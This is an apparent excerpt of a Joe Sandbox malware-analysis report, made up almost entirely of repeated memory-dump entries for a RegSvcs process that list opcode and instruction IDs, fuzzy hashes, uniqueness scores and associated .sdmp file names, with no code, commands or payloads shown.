                                                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                            • Instruction ID: 0c30b1d7462c814b172af066c025a7457cb6ddfdb1af398f560cfca98a45c0cc
                                                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                            • Instruction Fuzzy Hash: 67F0C2B2A00A10ABD324DF4DDC41E57F7EADFC0B90F048128A605C7220EA31DD04CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8f51d267b3d85d85c0218afbb75c153bcb17c8e901efececf5db2866ca44fb24
                                                                                            • Instruction ID: 6202c7336217f89a7bca0dcf012182f17741da46a1388e408b65ad4380699c87
                                                                                            • Opcode Fuzzy Hash: 8f51d267b3d85d85c0218afbb75c153bcb17c8e901efececf5db2866ca44fb24
                                                                                            • Instruction Fuzzy Hash: 260144B1A1024DEFDB04DFA9D9519DEB7F8EF48704F10406AF904E7351D778AA019BA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ccbee6b9ac590af74aba78429e901133b6650ac699f523a13330613c9c2533d
                                                                                            • Instruction ID: cc55a143ceef9a50851f951715201f24da521ba72fda9d3aff37f83c45e75a8b
                                                                                            • Opcode Fuzzy Hash: 6ccbee6b9ac590af74aba78429e901133b6650ac699f523a13330613c9c2533d
                                                                                            • Instruction Fuzzy Hash: D9F0C8716053089FC314FF69C942E1BB7E4EF48750F40465AB894DB391E638EA00DB96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                            • Instruction ID: c697f32b4448d22360ed6de1243b9406ddc46b2af5680e28c4322197b8574a9b
                                                                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                            • Instruction Fuzzy Hash: 3DF05E73B51615ABD321AA49DC80F26B3A9AFC5BA0F290065A604AB270C760EC01E7D0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                            • Instruction ID: 63e5c5188f7f2cd133badd6220b3f367183f9e90633d657622d6afbef3c7959a
                                                                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                            • Instruction Fuzzy Hash: 44F0B4B2610204AFE714DB21CC01F96B3E9EF99350F1580789545D71A0FAB4DE01E658
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5a0fc8abddc6be8ef0e3e2bbd5da701c1a5fafdb3389abf6b701e3b3e561fbea
                                                                                            • Instruction ID: 7bcb1f48ea92f4920eb57d2f64723f37294ab21119b3e8a27e2dffdb1e031384
                                                                                            • Opcode Fuzzy Hash: 5a0fc8abddc6be8ef0e3e2bbd5da701c1a5fafdb3389abf6b701e3b3e561fbea
                                                                                            • Instruction Fuzzy Hash: 82F0A470A0120CDFCB14EF65C511AAEB7B4EF04700F008055B945EB395DA78EA01DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 41bce817e107f6df01665431388043164620fa1bf3669e508a4d393d503a6eb1
                                                                                            • Instruction ID: 4390f965ccb107291b27f9159bdf70d67315e640455620053e0d6672ad6a6f46
                                                                                            • Opcode Fuzzy Hash: 41bce817e107f6df01665431388043164620fa1bf3669e508a4d393d503a6eb1
                                                                                            • Instruction Fuzzy Hash: 2CF0C732C022E88ED7328A288444B65B788AB02730F1CC96BD89D83102C324EC80E603
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8d5f65ad6e9ea243b45b9f3985973b80b65642e8eb9a4e3231b6d5e04f2965a
                                                                                            • Instruction ID: 79c75ca46d447b4ed2300e7cf100dba67b77b138494c7ce188de3ddc9102af67
                                                                                            • Opcode Fuzzy Hash: d8d5f65ad6e9ea243b45b9f3985973b80b65642e8eb9a4e3231b6d5e04f2965a
                                                                                            • Instruction Fuzzy Hash: B4F0203641B6951ADF726B2CB8A02D12BACA782510F1910C9ECE0A721EC57B8883C370
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f5c650044d3c4bf999332187811012d04a9ccfd88c317ab5f97d8bb4eef89cf
                                                                                            • Instruction ID: b1880963cf30a75eb18c45dd26ce785662fb26f38a04b91c6ab656effbfa20ce
                                                                                            • Opcode Fuzzy Hash: 3f5c650044d3c4bf999332187811012d04a9ccfd88c317ab5f97d8bb4eef89cf
                                                                                            • Instruction Fuzzy Hash: BBF0B8F29116909BD322DB18C148BA1B7E8AB46BB0F189526D80A87712C264CC80EAD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                            • Instruction ID: c43c4bc7179ff15f149adc411d6a39fafffdba3ebe124819fec29661763ec916
                                                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                            • Instruction Fuzzy Hash: 2BE0D832300A002BD712AE5ACCC1F87776EEFC2B10F040079B5045F252CAE6DD099AA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                            • Instruction ID: 516c6a0bb36bbb5052efc3c56dd485d8972f3b4a5a0e9aaf3054312a92e09759
                                                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                            • Instruction Fuzzy Hash: FAF08C721442049FF3228F09D840B57B7F9EB05364F01C065F6088B1A1D33AEC50CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction ID: 0c0d47911090a5c6d4f6e577159e8626e866284517c7a1144d00ed97eff4eb4d
                                                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction Fuzzy Hash: C3F0ED3A204395DBDB19DF19D040BE5BBA8EF55360B10409AE84A8B351EB35FD82EB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
• Instruction ID: e772814120855e1c41cfeaf99cb58807e7f49642a1c76b0ccccd99adbba8f85b
• Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
• Instruction Fuzzy Hash: 5DE09273684546ABC3212E55CC01B6676A59BD27A0F150429E1019B150DBB8EC40F798
Uniqueness
Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                            • Instruction ID: 127826dc828ade284bd9733b831d1b6f1576dc8a1d2c45c76727c0c8903e8637
                                                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                            • Instruction Fuzzy Hash: BFD05E36511A50AFC3329F1BEE01D53BBF9FBC5F20705062EA44693920C675AC06DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                            • Instruction ID: 5251e282e97c0753ce549a77d679912a6ca153470604fefa85fce7409f84d672
                                                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                            • Instruction Fuzzy Hash: 6FD0A932A08660ABDB32AA1CFC00FC333E9AB88B20F060459B008C7160C3A4AC81DA84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                            • Instruction ID: ff90cbf2c90452be4d5617f1b6c1c961014ef9ca7bd4134aa9b747861fd61a7c
                                                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                            • Instruction Fuzzy Hash: 80E0EC759506849BCF12EF59EA41F5EB7F9BB85B50F150054A0086B662C628AD00DB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction ID: bb942951e78d03659cd6211df682a8da6ac66f1aa73cd98748ec9d27afc29c44
                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction Fuzzy Hash: 4CD01233616070A7CB2966656D14FA779559B82BA4F1A006D780AB3910C5198C42FAE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                            • Instruction ID: 6ccd74eb80589b80fdc6eac700927d29733241298fa78fbcf2cab3f6b2f0be5f
                                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                            • Instruction Fuzzy Hash: C9D012771D054CBBCB11AF65DC02F957BA9E755BA0F444020B504875A1C63AE950D684
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 291fcf5fb16e48ccd542971811100acbe01f543056c9bb0bd80f976e856a5407
                                                                                            • Instruction ID: ace091a7c32a31d39d27ea6c814642a88507b5baac52e17c6f7b2b33b7d0f06c
                                                                                            • Opcode Fuzzy Hash: 291fcf5fb16e48ccd542971811100acbe01f543056c9bb0bd80f976e856a5407
                                                                                            • Instruction Fuzzy Hash: 2BD0A775901446CBCF16EF05C925E7E36B0EB14780B400068F60051170D72DDC02F740
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                            • Instruction ID: 07bc3ab2d4943e5df7beb9e902946e6062a7d57097f66f9a647d93206eeb4c54
                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                            • Instruction Fuzzy Hash: 27D09235612A80CFC65A8B08C5A9B5533A4BB44B44FC504A0E401CBB61DA68E944DA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
